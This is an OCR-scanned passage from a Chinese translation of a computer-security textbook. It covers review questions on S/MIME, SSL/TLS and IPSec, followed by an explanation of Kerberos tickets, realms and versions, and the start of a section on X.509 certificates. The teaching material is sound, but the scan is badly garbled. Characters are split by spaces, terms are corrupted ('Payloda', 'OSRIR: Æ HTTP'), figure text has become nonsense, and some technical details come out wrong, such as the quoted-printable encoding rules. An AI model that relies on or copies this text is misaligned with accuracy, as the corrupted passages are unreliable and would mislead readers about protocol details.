ners white paper, August 15, 2013. https://www.isecpartners.com/research/ 
white-papers.aspx 

STALI4a Stallings, W. Cryptography and Network Security: Principles and Practice, 
Sixth Edition. Upper Saddle River, NJ: Pearson, 2014. 


22.7 关键 术语 、 复 习题 和 习题 


关键 术语 
administrative management domain ( ADMD， 行 政 载荷 ) 
管理 域 ) Multipurpose Internet Mail Extension ( MIME ， 多 用 
Domain Name System (DNS ， 域 名 系统 ) 途 网 际 邮 件 扩展 ) 
DomainKeys Identified Mail (DKIM， 域 名 密 钥 识 别 Secure Sockets Layer (SSL， 安 全 套 接 层 ) 
邮件 ) Transport Layer Security (TLS， 传 输 层 安 全 ) 


Encapsulating Security Payloda (ESP， 封 装 安全 


复习 


22.1 
22.2 
22.3 
22.4 
22.5 
22.6 
22.7 
22.8 
22.9 
22.10 
22.11 


习题 


22.1 


22.2 


22.3 


22.4 
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题 


列 出 S/MIME 支持 的 4 个 功能 。 
HAE R64 转换 ? 
为 什么 R64 转换 对 电子 邮件 应 用 非常 有 用 ? 
什么 是 DKIM ? 
SSL 由 哪些 协议 构成 ? 
SSL 连接 和 SSL 会 话 之 间 有 什么 不 同 ? 
SSL 记录 协议 可 以 提供 哪些 服务 ? . 
HTTPS 的 目的 是 什么 ? 
IPSec 提供 哪些 服务 ? 

什么 是 IPSec 安全 关联 ? 

在 IPSec 中 提供 认证 的 是 哪 两 种 方式 ? 


在 SSL 和 TLS 中 ， 为 什么 有 一 个 单独 的 改变 密码 规范 协议 ， 而 不 是 把 改变 密码 规范 (chang_ 
cipher_spec) 消息 包含 在 握手 协议 中 ? 
考虑 下 列 Web 安全 性 威胁 ， 并 通过 SSL 的 每 一 个 详细 特征 描述 每 个 威胁 是 怎么 解决 的 ? 
a. Man-in-the-middle Kit: 攻击 者 在 密 钥 交换 期 间 进 行 干预 假冒 客 户 端 到 服务 器 ,假冒 服务 器 
到 客户 端 。 
b. OSRIR: Æ HTTP 或 其 他 应 用 传输 的 口令 被 窃听 。 
c. IP 欺骗 : 利用 伪造 的 P 地址 欺骗 主机 接收 伪造 的 数据 。 
d. IP 劫持: 在 两 台 主 机 间 主 动 的 认证 连接 被 打 断 ， 攻 击 者 替代 其 中 一 台 主 机 。 
e. SYN 洪 泛 攻击 : 攻击 者 发 送 TCP SYN 消息 请 求 连接 ， 但 是 不 回应 最 后 的 消息 建立 完整 的 连接 。 
被 攻击 TCP 模块 一 般 要 持续 半 连 接 ( half-open connection) 状态 数 分 钟 。 重 复 SYN 消息 可 以 阻 
塞 TCP 模块 。 
在 本 章 所 学 知识 的 基础 上 ,在 SSL 中 对 已 到 达 接 收 者 的 无 序 的 SSL 记录 块 进行 重新 排序 是 可 能 的 
吗 ? 如 果 可 以 , 解释 一 下 如 何 做 。 如 果 不 能 ， 为 什么 ? 
进行 重 放 攻击 时 ， 攻 击 者 获取 了 一 个 认证 包 的 备份 ， 然 后 把 它 传输 到 想 要 的 目的 地 。 双 份 的 收据 和 认证 
卫 包 ,在 某 些 方式 下 可 以 扰乱 服务 或 者 产生 一 些 无 法 预料 的 结果 。 在 IPSec 认证 报头 中 的 序列 号 域 的 
设计 是 用 来 阻止 这 种 攻击 的 。 因 为 P 是 一 个 无 连接 的 、 不 可 靠 的 服务 ， 协 议 不 能 保证 每 个 包 都 被 顺 
序 传输 或 保证 所 有 的 包 被 传输 。 因 此 IPSec 认证 文档 规定 接收 者 应 该 使 用 大 小 为 W (CW 默认 值 为 64 ) 
的 窗口 。 窗 口 的 右边 缘 表 示 最 高 的 序列 号 N， 到 目前 为 止 接收 了 一 个 有 效 的 包 。 对 任何 一 个 序列 号 
在 N-W+1 和 NN 之 间 的 已 经 正确 接收 的 (也 就 是 通过 了 认证 ) 包 ， 在 窗口 中 相应 的 槽 被 标记 ( 见 
图 22-9 )。 从 图 中 试 着 推出 ， 当 一 个 包 被 接收 到 时 处 理 过 程 是 如 何 进行 的 ? 解释 一 下 如 何 应 对 重 放 攻 击 。 


如 果 到 右边 的 有 效 包 
进 窗 口 


» 


固定 窗口 大 小 Ww 





如 果 有 效 包 被 接 收 就 标记 。 ”5 如 果 有 效 包 没有 被 接收 就 不 标记 
22-9 反 重 放 机 制 
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22.5 


22.6 


IPSec ESP 可 以 用 于 两 种 不 同 的 操作 模式 。 在 第 一 种 模式 中 ，ESP 被 用 来 加 密 或 有 选择 地 认证 IP 传 
送 的 数据 (例如 ，TCP 段 )。 由 于 这 种 模式 应 用 IPv4， 因 此 ESP 报头 被 插入 到 IP 包 中 ， 紧 挨 着 位 
于 传输 层 ( transport-layer) 报头 (例如 TCP、UDP 和 ICMP 等 ) 之 前 ， 并 且 在 IP 包 之 后 紧 跟 的 是 
ESP 跟踪 器 (填充 、 填 充 长 度 和 邻接 报头 域 )。 如 果 认 证 已 选择 ，ESP 认证 数据 域 被 加 到 ESP 跟踪 
器 之 后 。 整 个 传输 层 段 加 上 ESP 跟踪 器 被 加 密 。 认 证 包括 所 有 的 密 文 加 上 ESP 报头 。 在 第 二 种 模 
AF, ESP 用 来 加 密 整个 IP 包 。 对 于 这 种 模式 ，ESP 报头 放 到 包 的 前 面 ， 然 后 包 附加 ESP 跟踪 器 
被 加 密 。 这 种 方法 可 以 用 来 对 抗 流量 分 析 。 因 为 IP 报头 包含 了 目的 地 址 和 可 能 的 源 路 由 方向 指示 
和 一 跳 一 跳 的 选择 信息 ， 它 是 不 可 能 简单 地 传输 加 密 的 卫 包 (前面 附加 了 ESP) 的 。 中 间 路 由 
将 不 能 处 理 这 样 的 包 。 因 此 用 一 个 包含 足够 路 由 信息 的 IP 新 头 封 装 整个 块 (ESP 报头 加 上 密 文 加 
上 认证 数据 ， 如 果 出 现 ) 是 非常 重要 的 。 建 议 应 用 这 两 种 模式 。 

把 radix-64 转换 为 一 种 加 密 方式 。 在 这 种 情况 下 ， 没 有 密 钥 。 设 想 攻击 者 仅仅 知道 一 些 置换 算法 被 
用 来 加 密 英文 文本 而 猜 不 到 是 R64。 这 个 算法 对 抗 密码 分 析 ， 其 有 效 性 如 何 ? 

在 S/MIME 中 一 种 代替 radix-64 转换 的 是 引用 转换 编码 ( quoted-printable transfer coding)。 前 两 种 
编码 规则 如 下 : 

1. 通用 8 位 表示 法 : 这 个 规则 是 在 没有 其 他 规则 适用 时 应 用 。 任 何 字符 由 一 个 两 位 的 十 六 进 制 表 
示 的 八 位 组 的 值 的 一 个 平等 的 标记 表示 。 例 如 ，ASCII 码 十 进 制 12 的 8 位 值 由 “三 0C” 表 示 。 
2. 字面 表示 : 在 十 进 制 33 ~ 126 范围 的 任何 字符 ， 十 进 制 61 用 ASCI 字符 表示 。 保 留 的 规则 处 

理 空格 和 换行 。 解 释 引 用 和 base 64 编码 之 间 的 不 同 。 
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学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
© 概述 Kerberos 的 基本 操作 ; 


@ 比较 Kerberos 版 本 4 和 Kerberos 版 本 5 的 功能 ; 
e 理解 X.509 证 书 的 格式 和 功能 ; 
© 解释 公 钥 基础 设施 概念 。 


本 章 介绍 一 些 为 支持 基于 网 络 的 认证 和 数字 签名 而 开发 的 认证 功能 。 
首先 介绍 最 早 且 被 最 广泛 使 用 的 服务 : Kerberos; 然后 介绍 X.509 公 钥 证 书 ; 最 后 ,介绍 
公 钥 基础 设施 (PKI) 的 概念 。 


23.1 Kerberos 


组 织 可 以 使 用 很 多 种 方法 保证 联网 的 服务 器 和 主机 的 安全 。 系 统 可 以 使 用 一 次 性 口令 来 阻 
止 猜 解 口令 或 捕获 用 户口 令 的 企图 。 这 些 系统 由 于 需要 使 用 专门 的 设备 (例如 ， 智 能 卡 或 者 同 
步 口令 生成 器 等 ) 来 操作 ， 因 此 在 通常 的 组 网 使 用 中 一 直 没 有 被 人 们 接受 。 另 一 种 方法 是 使 用 
生物 测量 (biometric) 系统 。 这 是 基于 一 些 生 理 特征 的 验证 或 识别 身份 的 自动 方法 ， 其 中 的 生 
理 特征 包括 指纹 、 虹 膜 ， 或 者 行为 特征 ， 如 笔迹 或 按键 节奏 等 。 需 要 强调 的 是 ， 这 些 系 统 也 需 
要 专门 的 设备 。 

另 一 种 解决 这 个 问题 的 方法 ， 是 使 用 绑 定 在 安全 认证 服务 器 上 的 认证 软件 。 这 种 方法 被 
Kerberos 采用 。Kerberos 最 初 是 由 MIT 开发 的 ， 它 是 一 个 在 公共 领域 和 商业 中 都 得 到 支持 的 
软件 工具 。Kerberos 作为 一 个 Internet 标准 已 经 发 布 ， 并 且 是 远程 认证 的 事实 上 的 标准 。 

Kerberos 的 整个 方案 就 是 一 个 可 信任 的 第 三 方 认证 服务 。 从 客户 端 和 服务 器 信任 Kerberos 
作为 它们 相互 认证 的 媒介 的 意义 上 来 看 ，Kerberos 方案 是 可 值得 信任 的 。 本 质 上 ，Kerberos 要 
求 用 户 调用 每 个 服务 时 需要 证 明 他 的 身份 ， 并 且 可 随意 要 求 服务 器 向 客户 端 证 明 它们 的 身份 。 


23.1.1 Kerberos 协议 


Kerberos 使 用 了 一 个 包括 客户 端 、 应 用 服务 器 和 一 个 Kerberos 服务 器 的 协议 。 这 个 协议 
的 复杂 性 反映 了 这 样 一 个 事实 : 敌手 有 许多 威胁 安全 的 方法 。Kerberos 是 被 设计 用 来 对 抗 针对 
客户 端 / 服 务 器 对 话 安全 的 多 种 威胁 的 。 

它 的 基本 思想 非常 简单 。 在 一 个 不 受 保护 的 网 络 环境 中 ， 任 何 一 个 客户 端 可 以 使 用 任何 一 
台 服 务 器 提供 服务 。 很 明显 的 安全 性 风险 是 伪装 ( impersonation)。 敌 手 可 以 装扮 成 男 一 个 客 
户 端 ， 并 在 服务 器 上 获得 没有 经 过 认证 的 权限 。 为 了 对 付 这 种 威胁 ， 服 务 器 必须 能 确认 请 求 服 
务 的 客户 端的 身份 。 每 个 服务 器 被 要 求 承 担 客 户 端 / 服务 器 每 次 交互 的 风险 ， 但 这 在 一 个 开放 
的 环境 中 ， 会 给 每 个 服务 器 造成 沉重 的 负担 。 一 个 替代 的 办 法 是 ， 使 用 一 个 认证 服务 器 (AS)， 
它 知道 所 有 用 户 的 口令 ， 并 把 它们 存储 在 一 个 集中 的 数据 库 中 。 然 后 用 户 就 可 以 登录 AS 进行 
身份 验证 。 一 旦 AS 验证 了 (verified) 用 户 的 身份 ， 它 可 以 把 这 个 信息 传送 到 一 个 应 用 服务 器 ， 
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个 应 用 服务 器 就 将 接受 客户 端的 服务 请 求 。 
关键 问题 是 如 何在 一 种 安全 方式 下 完成 上 述 工 作 。 不 能 简单 地 这 样 做 : 不 让 客户 端 在 网 络 
上 把 用 户口 令 发 送 到 AS， 因 为 敌手 可 以 在 网 络 上 观测 到 用 户 的 口令 ， 然 后 重用 该 口令 ; 不 让 
Kerberos 将 一 个 明文 消息 发 送 到 一 个 服务 器 验证 客户 端 身份 ， 因 为 敌手 可 以 装扮 成 AS 并 发 送 
一 个 假 的 确认 信息 。 
解决 这 个 问题 的 方式 是 使 用 加 密 手 段 和 一 个 完成 任务 ( 见 图 23-1 ) 的 消息 集合 。 
Kerberos 中 ， 使 用 的 加 密 算法 是 数据 加 密 标 准 (DES). 


2. AS 在 数据 库 中 检查 用 户 的 访问 权限 ， 
生成 票据 授予 票据 和 会 话 密 钥 。 用 由 
用 户口 令 派 生出 的 密 钥 加 密 结果 


每 当 用 户 登录 会 话 时 
执行 一 次 






1. 用 户 登录 工作 站 ， 
并 请 求 主机 服务 






T 示 
“AES, HES EWR, Re eat 
解密 到 来 的 消息 应 被 请 求 应 用 服务 器 的 
ka 
然后 将 票据 以 及 包 这 票据 


Ra 





含 用 户 名 、 网 络 地 
址 和 时 间 的 认证 符 | gp 
发 给 TGS RZ 





uke oe ®, a6 EREET 

5. 工作 站 向 主机 ”执行 一 次 后 允许 访问 服务 。 
发 送 票 据 和 认 主机 /应 用 如 果 需 要 双向 认证 ， 
服务 器 服务 器 就 返回 一 个 


图 23-1 Kerberos 总 览 


AS 和 每 一 个 服务 器 共享 一 个 唯一 的 安全 密 钥 。 密 钥 依 据 物理 方式 或 其 他 安全 方式 分 发 。 
这 可 以 使 AS 能 够 以 一 种 安全 的 方式 把 消息 发 送 到 应 用 服务 器 。 首 先 ， 用 户 X 登录 到 一 个 工作 
站 并 且 请 求 访问 服务 器 V。 客 户 端 把 一 个 包含 用 户 ID 和 被 称 为 TGT ( Ticket-Granting Ticket, 
票据 授予 票据 ) 请 求 的 消息 发 送 到 AS。AS 在 它 的 数据 库 中 查找 这 个 用 户 的 口令 。 然 后 AS 回 
复 一 个 TGT 和 一 个 称 为 会 话 密 钥 的 一 次 性 加 密 密 钥 。 这 两 个 加 密 都 使 用 用 户口 令 作 为 加 密 密 
钥 。 当 这 个 消息 返回 到 客户 端 时 ， 客 户 端 提 示 用 户 输入 他 的 口令 ,产生 密 钥 ， 并 试图 解密 到 达 
的 消息 。 如 果 提 供 了 正确 的 口令 ， 票 据 (ticket) 和 会 话 密 钥 就 会 成 功 地 被 恢复 。 

注意 这 其 中 发 生 了 什么 。 既然 用 户 知道 正确 的 口令 ，AS 就 能 验证 用 户 的 身份 ， 但 是 它 是 
以 口令 从 不 在 网 络 上 传送 的 方式 执行 的 。 此 外 ，AS 已 向 客户 端 发 送 了 信息 (该 信息 将 在 以 后 
向 服务 器 请 求 服务 时 要 用 到 )， 并 且 信 息 是 安全 的 ， 因 为 使 用 用 户 的 口令 对 其 进行 了 加 密 。 

票据 组 成 了 一 个 客户 端 用 来 请 求 服务 的 信任 证 书 (credential) 的 集合 。 票 据 显 示 AS 已 经 
接受 了 这 个 客户 端 和 它 的 用 户 。 票 据 包 含 用 户 DD、 服务 器 DD、 一 个 时 间 稚 、 票 据 过 期 将 失效 
的 票据 生存 期 ( lifetime)， 以 及 在 外 部 消息 中 发 送 到 客户 端的 一 个 相同 会 话 密 钥 的 副本 。 整 个 
票据 使 用 AS 和 服务 器 共享 的 DES 密 钥 加 密 。 因 此 没 人 可 以 使 用 票据 进行 欺骗 。 

现在 ，Kerberos 应 该 已 经 建立 起 来 ， 以 使 AS 能 发 回 一 个 票据 授予 访问 (Ticket-Granting 


#23 ¢ Internet KiEX A S511 


Access, TGA) 到 一 个 特定 的 应 用 服务 器 。 这 就 要 求 客户 端 在 一 个 登录 会 话 期 间 为 用 户 想 要 使 
用 的 每 个 服务 从 AS 请 求 一 个 新 的 票据 。 请 求 新 票据 将 依次 要 求 AS 为 每 次 服务 请 求 查询 客户 
的 口令 ,或 者 也 将 口令 存储 在 内 存 中 以 供 登 录 会 话 期 间 使 用 。 第 一 个 过 程 对 用 户 来 说 是 困难 
的 ， 而 第 二 个 过 程 面临 着 安全 风险 。 因 此 ，AS 提供 一 个 票据 对 专门 的 应 用 服务 并 没有 什么 好 
处 ， 但 是 对 一 个 专门 的 票据 授予 服务 ( Ticket-Granting Service, TGS) 却 是 有 好 处 的 。AS A 
户 端 一 个 票据 ， 它 能 被 用 来 获得 更 多 的 票据 。 

想法 就 是 这 个 票据 可 以 让 客户 端 用 来 请 求 多 个 服务 授予 票据 。 所 以 票据 授予 票据 是 可 以 
再 度 使 用 的 。 然 而 我 们 不 希望 敌手 能 捕获 到 这 个 票据 并 使 用 它 。 考 虑 下 列 情节 : 一 个 敌手 捕获 
了 这 个 票据 ， 并 且 一 直 等 到 用 户 退 出 工作 站 。 然 后 该 敌手 或 者 访问 工作 站 ， 或 者 把 自己 的 工作 
站 配置 成 受到 侵害 的 工作 站 的 网 络 地 址 。 接 下 来 敌手 就 能 重用 票据 去 欺骗 TGS。 为 了 应 对 这 
种 情况 ， 票 据 中 包含 了 一 个 时 间 戳 (表明 了 票据 发 行 的 日 期 和 时 间 ) 和 票据 生存 期 (表明 了 票 
据 有 效 的 时 间 长 度 ， 例 如 8 个 小 时 )。 这 样 ， 客 户 端 现在 就 有 了 一 个 可 重用 的 票据 ， 并 且 不 再 
需要 打扰 用 户 为 每 个 新 服务 请 求 都 提供 口令 了 。 最 后 注意 ， 票 据 授 予 票据 是 用 一 个 仅 有 AS 和 
TGS 知道 的 密 钥 进行 加 密 的 。 这 可 防止 票据 被 更 改 。 票 据 是 使 用 基于 用 户口 令 的 密 钥 再 次 进 
行 加 密 的 ， 这 确保 了 提供 认证 的 票据 仅 能 由 正确 的 用 户 恢复 。 

让 我 们 看 看 这 是 如 何 工作 的 。 用 户 已 经 请 求 访问 服务 器 V。 客 户 端 用 户 〈C) 获得 了 一 个 票 
据 授 予 票据 和 一 个 临时 的 会 话 密 钥 。 客 户 端 然 后 向 TGS 发 送 一 个 消息 ， 为 用 户 X 请 求 一 个 票 
据 ， 准 许 服务 器 提供 服务 。 消 息 包括 服务 器 V 的 ID 和 一 个 票据 授予 票据 。TGS 解密 到 达 的 票据 
(注意 ， 票 据 是 经 过 加 密 的 ， 加 密 密 钥 只 有 AS 和 TGS 知道 )， 并且 由 它 自己 的 了 D 验证 解密 是 否 成 
功 。 它 检查 以 确保 生存 期 没有 过 期 。 然 后 通过 比较 到 达 信 息 的 用 户 ID 和 网 络 地 址 来 验证 用 户 。 

在 这 一 点 上 ，TGS 时 刻 准 备 着 给 每 个 客户 端 一 个 服务 授予 票据 。 但 这 有 另外 一 个 威胁 需 
要 克服 。 问 题 的 核心 是 生存 期 与 票据 授予 票据 是 相关 联 的 。 如 果 生 存 期 非常 短 ( 例 如 几 分 钟 )， 
那么 用 户 将 被 重复 地 索要 口令 。 如 果 生 存 期 长 (比如 多 个 小 时 )， 那 么 敌手 就 会 有 很 大 的 机 会 
进行 重 放 攻 击 。 敌 手 可 以 在 网 络 上 窃听 和 捕获 票据 授予 票据 的 备份 ， 并 且 一 直 等 到 合法 用 户 退 
出 。 然 后 敌手 可 以 伪造 合法 用 户 的 网 络 地 址 并 向 TGS 发 送 一 个 消息 。 这 将 使 敌手 能 不 受 限制 
地 访问 合法 用 户 才 能 使 用 的 资源 和 可 用 文件 。 

为 了 回避 这 个 问题 ，AS 为 客户 端 和 TGS 都 提供 一 个 它们 当前 正在 共享 的 会 话 密 钥 。 这 个 
会 话 密 钥 ， 回 想 一 下 ， 是 在 AS 发 往 客 户 端的 消息 中 ， 它 使 用 用 户口 令 加 密 。 它 也 被 隐藏 在 票 
据 授 予 票据 中 ， 使 用 AS 和 TGS 共享 的 密 钥 进行 加 密 。 在 向 TGS 请 求 一 个 服务 授予 票据 的 消 
息 中 ， 客 户 端 包含 了 一 个 用 会 话 密 钥 加 密 的 认证 符 (authenticator)， 它 包括 用 户 的 ID 、 地 址 和 
一 个 时 间 戳 。 不 像 票 据 是 可 重用 的 ， 认 证 符 仅 能 被 使 用 一 次 并 且 有 效 期 非常 短 。 现 在 ，TGS 可 
以 使 用 它 和 AS 共享 的 密 钥 解密 奈 据 。 票 据 指 出 用 户 X 已 经 被 提供 了 会 话 密 钥 。 事 实 上， 票据 
说 :“ 使 用 这 个 会 话 密 钥 的 必须 是 X。”TGS 用 这 个 会 话 密 钥 解密 认证 符 。 然 后 TGS 可 以 用 到 
达 消 息 的 票据 和 网 络 地 址 检查 来 自 认 证 符 的 名 字 和 地 址 。 如 果 所 有 的 都 匹配 ， 那 么 TGS 确定 
票据 的 发 送 者 确实 是 票据 的 真实 拥有 者 。 事 实 上 就 是 ， 认 证 符 说 :“ 在 这 个 认证 符 的 使 用 时 间 
里 ， 我 因此 使 用 这 个 会 话 密 钥 。” 注意， 票据 不 能 证 明 任 何人 的 身份 ， 但 是 它 是 一 种 安全 分 发 
密 钥 的 方式 。 证 明 客 户 端 身份 的 是 认证 符 。 由 于 认证 符 仅 能 使 用 一 次 并 且 生 存 期 也 非常 短 ， 这 
就 解除 了 敌手 窃取 票据 和 认证 符 所 造成 的 威胁 。 如 果 客 户 端 想 要 为 一 个 新 的 服务 授予 票据 应 用 
TGS， 它 会 在 重用 的 票据 授予 票据 中 附加 一 个 新 的 认证 符 后 发 送 。 

在 协议 中 接 下 来 的 两 步 是 重复 最 后 两 个 过 程 。TGS 发 送 一 个 服务 授予 票据 和 一 个 新 的 会 
话 密 钥 到 客户 端 。 整 个 消息 使 用 旧 的 会 话 密 钥 进行 加 密 ， 使 得 仅 有 客户 端 可 以 恢复 消息 。 票 据 
使 用 仅 有 TGS 和 服务 器 V 可 以 共享 的 密 钥 加 密 。 客 户 端 现在 有 了 一 个 对 服务 器 V 可 以 重用 的 
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服务 授予 票据 。 

每 次 用 户 想 要 使 用 服务 V， 客 户 端 可 以 发 送 这 个 附加 了 一 个 认证 符 的 票据 到 服务 器 V。 认 
证 符 使 用 新 的 会 话 密 钥 加 密 。 

如 果 需 要 相互 认证 ， 服 务 器 可 以 用 来 自 认证 符 的 时 间 戳 的 值 回 复 ， 值 增加 1， 并 且 使 用 会 
话 密 钥 加 密 。 客 户 端 可 以 通过 解密 这 个 消息 来 恢复 增加 的 时 间 崔 。 因 为 消息 是 由 会 话 密 钥 加 密 
的 ， 所 以 客户 端 就 可 以 确认 消息 仅 能 由 服务 器 V 来 创建 。 消 息 的 内 容 确保 C 不 是 一 个 旧 的 回 
复 的 重 放 。 

最 后 ， 这 个 过 程 的 结论 就 是 ， 客 户 端 和 服务 器 共享 一 个 密 钥 。 这 个 密 钥 能 被 用 来 加 密 将 在 
客户 端 和 服务 器 间 发 送 的 消息 ,或 者 是 为 了 彼此 发 送 消息 而 交换 新 的 会 话 密 钥 所 发 送 的 消息 。 


23.1.2 Kerberos 域 和 多 Kerberi 


一 个 提供 全 套 服务 的 Kerberos 环境 包括 一 台 Kerberos 服务 器 、 若 干 客 户 端 和 若干 应 用 服 
务 器 。 这 个 环境 有 如 下 要 求 : 

1. Kerberos 服务 器 的 数据 库 中 必须 存 有 所 有 参与 的 用 户 ID 和 口令 。 所 有 用 户 都 要 在 
Kerberos 服务 器 上 注册 。 

2. Kerberos 服务 器 必须 和 每 一 个 服务 器 共享 一 个 秘密 密 钥 。 所 有 的 服务 器 都 要 在 Kerberos 
服务 器 上 注册 。 

这 种 环境 被 称 为 Kerberos 域 。 在 不 同 管理 组 织 下 的 客户 端 和 服务 器 的 网 络 通常 组 成 不 同 
的 域 ( 见 图 23-2 )。 也 就 是 说 ， 让 在 一 个 管理 域名 中 的 用 户 和 服务 器 在 其 他 地 方 的 Kerberos AR 
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务 器 上 注册 通常 是 不 实用 的 ， 并 且 是 不 符合 管理 策略 的 。 然 而 在 一 个 域 中 的 用 户 也 许 需 要 访问 
另 一 个 域 中 的 服务 器 ， 而 且 一 些 服务 器 也 愿意 向 其 他 域 中 的 那些 经 过 认证 了 的 用 户 提 供 服务 。 

Kerberos 提供 了 一 个 支持 域 间 认证 的 机 制 。 对 两 个 支持 域 间 认 证 的 域 来 说 ， 在 每 个 互通 的 
域 中 Kerberos 服务 器 和 在 另外 一 个 域 中 的 服务 器 共享 一 个 密 钥 。 两 个 Kerberos 服务 器 可 以 互 
相 注册 。 

这 个 方案 要 求 ， 一 个 域 中 的 Kerberos 服务 器 需 信任 另 一 个 域 中 的 Kerberos 服务 器 对 其 用 
户 进行 认证 。 此 外 ， 在 第 二 个 域 中 参与 的 服务 器 也 必须 信任 在 第 一 个 域 中 的 Kerberos 服务 器 。 

有 了 以 上 这 些 基本 规则 ， 我 们 可 以 如 下 描述 这 个 机 制 ( 见 图 23-2 ) : 一 个 用 户 想 要 使 用 另 
一 个 域 中 的 服务 器 提供 的 服务 ， 就 需要 一 张 使 用 那个 服务 器 的 票据 。 用 户 的 客户 端 按照 通常 的 
程序 访问 本 地 的 TGS， 然 后 为 一 个 远程 的 TGS ( TGS 在 另外 一 个 域 中 ) 请 求 一 个 票据 授予 票 
据 。 接 下 来 ， 客 户 端 就 可 以 向 远程 TGS 请 求 一 张 在 该 远程 TGS 所 在 域 中 的 服务 器 的 服务 授予 
票据 。 

出 现在 远程 服务 器 的 票据 指出 了 用 户 最 初 被 认证 的 域 。 服 务 器 选择 是 否 允 许 远程 请 求 。 

前 面 所 论述 的 方案 中 的 一 个 问题 是 ， 它 对 于 有 许多 域 的 情况 的 可 伸缩 性 不 好 。 如 果 有 N 
个 域 ， 那 么 就 必须 有 N(N-1)/2 次 密 钥 交换 来 使 得 每 个 Kerberos 域 可 以 和 其 他 任何 Kerberos 域 
进行 互 操作 。 


23.1.3 ”版 本 4 和 版 本 5 


最 广泛 使 用 的 Kerberos 版 本 是 版 本 4， 它 已 经 使 用 了 数 年 。 最 近 出 现 了 版 本 S。 版 本 5 中 
最 重要 的 改进 如 下 : 首先 ， 在 版 本 5 中 一 个 加 密 消 息 绑 定 一 个 加 密 的 算法 标识 符 。 这 使 得 用 户 
能 用 其 他 非 DES 的 算法 配置 Kerberos。 最 近 DES 的 可 靠 性 受到 了 一 些 关注 ， 版 本 5 正好 给 了 
用 户 使 用 其 他 算法 的 选择 。 

版 本 5 也 支持 一 种 叫 作 认证 转发 (authentication forwarding) 的 技术 。 版 本 4 不 允许 将 发 
放 给 一 个 客户 端的 证 书 转发 给 其 他 主机 ， 并 由 其 他 客户 端 使 用 。 版 本 5 的 这 种 功能 可 以 使 得 一 
个 客户 端 访问 一 台 服 务 器 ， 并 让 这 人 台 服 务 器 代表 该 客户 端 访问 另外 一 台 服 务 器 。 例 如 ， 一 个 客 
户 端 访 问 一 个 打印 服务 器 ， 然 后 打印 服务 器 使 用 客户 端的 名 义 访 问 文件 服务 器 中 该 客户 端的 
文件 。 

最 后 ， 版 本 5 支持 一 种 比 在 版 本 4 中 需要 更 少 的 安全 密 钥 交换 的 域 间 认 证 (interrealm 


authentication ) 办 法 。 


23.1.4 ”性 能 问题 


当 客 户 端 /服务 器 应 用 变 得 越 来 越 普遍 ， 越 来 越 大 的 客户 端 /服务 器 装置 开始 出 现 。 可 能 
造成 的 情况 就 是 网 络 环境 规模 越 大 ， 登 录 认 证 就 越 重要 。 但 问题 是 ， 在 一 个 大 规模 环境 中 什么 
会 影响 Kerberos 的 性 能 呢 ? 

幸运 的 是 ， 如 果 系 统 配置 得 合适 ， 对 Kerberos 就 只 有 很 小 的 性 能 影响 。 赣 记 票 据 是 可 重 
用 的 。 因 此 ， 授 予 票据 请 求 对 流量 的 需求 是 有 限 的 。 至 于 登录 认证 票据 的 转移 ， 登 录 交 换 无 论 
如 何 都 必须 要 发 生 ， 因 此 额外 的 费用 也 是 有 限 的 。 

一 个 相关 的 问题 是 ，Kerberos 服务 器 应 用 是 否 需 求 一 个 专门 的 平台 ， 或 者 是 能 和 其 他 应 
用 共享 一 台 计 算 机 。 在 同一 台 机 器 上 运行 资源 敏感 的 应 用 服务 器 (例如 ， 数 据 库 服务 器 ) 和 
Kerberos 服务 器 可 能 是 不 明智 的 。 而 且 ， 只 有 当 Kerberos 服务 器 在 一 个 专门 的 、 隔 离 的 机 器 上 
运行 时 ，Kerberos 的 安全 性 才能 得 到 最 好 的 保证 。 

最 后 ， 在 一 个 大 系统 中 ， 为 保持 性 能 有 必要 用 到 多 域 吗 ? 也 许 不 。 准 确 地 说 ， 采 用 多 域 的 
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动机 是 管理 。 如 果 你 有 地 理 上 独立 的 机 器 徐 , 每 一 个 徐 有 自己 的 管理 员 ， 那么 一 个 域 一 个 管理 
员 也 许 是 方便 的 。 然 而 ， 这 不 是 通常 的 情况 。 


23.2 X.509 


在 2.4 节 中 对 公 钥 证 书 做 了 简要 的 介绍 。 本 质 上 来 说 ， 一 个 证 书 由 一 个 公 钥 加 上 密 钥 所 
有 者 的 用 户 ID 组 成 ， 整 个 组 由 可 信 的 第 三 方 签名 。 典 型 的 第 三 方 是 一 个 认证 中 心 ( Certificate 
Authority，CA)， 它 是 受用 户 团体 信任 的 ， 如 政府 代理 机 构 、 金 融 机 构 、 电 信 公 司 或 者 其 他 可 
信和 的 权威 组 织 。 用 户 可 以 向 认证 中 心 以 一 种 安全 的 方式 出 示 他 的 公 钥 并 获得 一 个 证 书 ， 然 后 用 
户 可 以 发 行 证 书 。 需 要 这 个 用 户 的 公 钥 的 任何 人 可 以 获得 证 书 并 且 通 过 附加 可 信 的 签名 的 方式 
来 进行 有 效 性 的 验证 。 图 23-3 给 出 了 这 个 过 程 。 


版 本 1 
版 本 2 
3 
FA 
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已 撤销 


已 撤销 
证 书 


签名 





b) 证 书 撤销 列表 


<> 
所 有 版 本 





a) X.509 证 书 


Æ 23-3 X.509 的 格式 


X.509 ITU-T 标准 在 RFC 5280 中 有 详细 的 描述 ， 是 最 为 广泛 接受 的 公 钥 证 书 格式 。X.509 
证 书 被 用 于 大 多 数 网 络 安全 应 用 ， 包 括 IP 安全 ( IPSEC)、 安 全 套 接 字 层 (SSL)、 安 全 电子 交 
易 (SET)、S/MIME， 以 及 电子 商务 应 用 。 

X.509 证 书包 括 图 23-3a 中 所 示 元 素 。 主 要 元 素 包括 具有 X.500 主体 名 称 的 密 钥 和 公 钥 信 
息 、 有 效 期 、CA 发 放 者 名 称 ， 以 及 将 这 些 信息 绑 定 在 一 起 的 这 些 信息 的 签名 。 当 前 X.509 证 
书 使 用 版 本 3 的 格式 ， 这 种 格式 包括 了 一 个 更 为 普遍 的 延展 机 制 ， 这 一 机 制 能 够 提供 更 多 的 
灵活 性 以 及 传递 特定 情形 所 需 的 信息 。 有 关 X.509 证 书 的 格式 和 组 成 元 素 的 更 多 信息 请 参见 
[STAL14a]。 

有 一 个 重要 的 扩展 ， 在 “基本 限制 ”(Basic Constraints) 集中 ， 用 于 说 明证 书 是 否 来 自 某 
个 CA。CA 证 书 仅仅 用 来 对 其 他 的 证 书 进行 签名 。 和 否则 ， 证 书 则 属于 “终端 用 户 ”( 或 “终端 
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实体 ” )， 并 可 用 来 检验 服务 器 或 客户 端的 身份 ， 对 电子 邮件 或 其 他 内 容 进行 签名 或 加 密 ， 对 可 
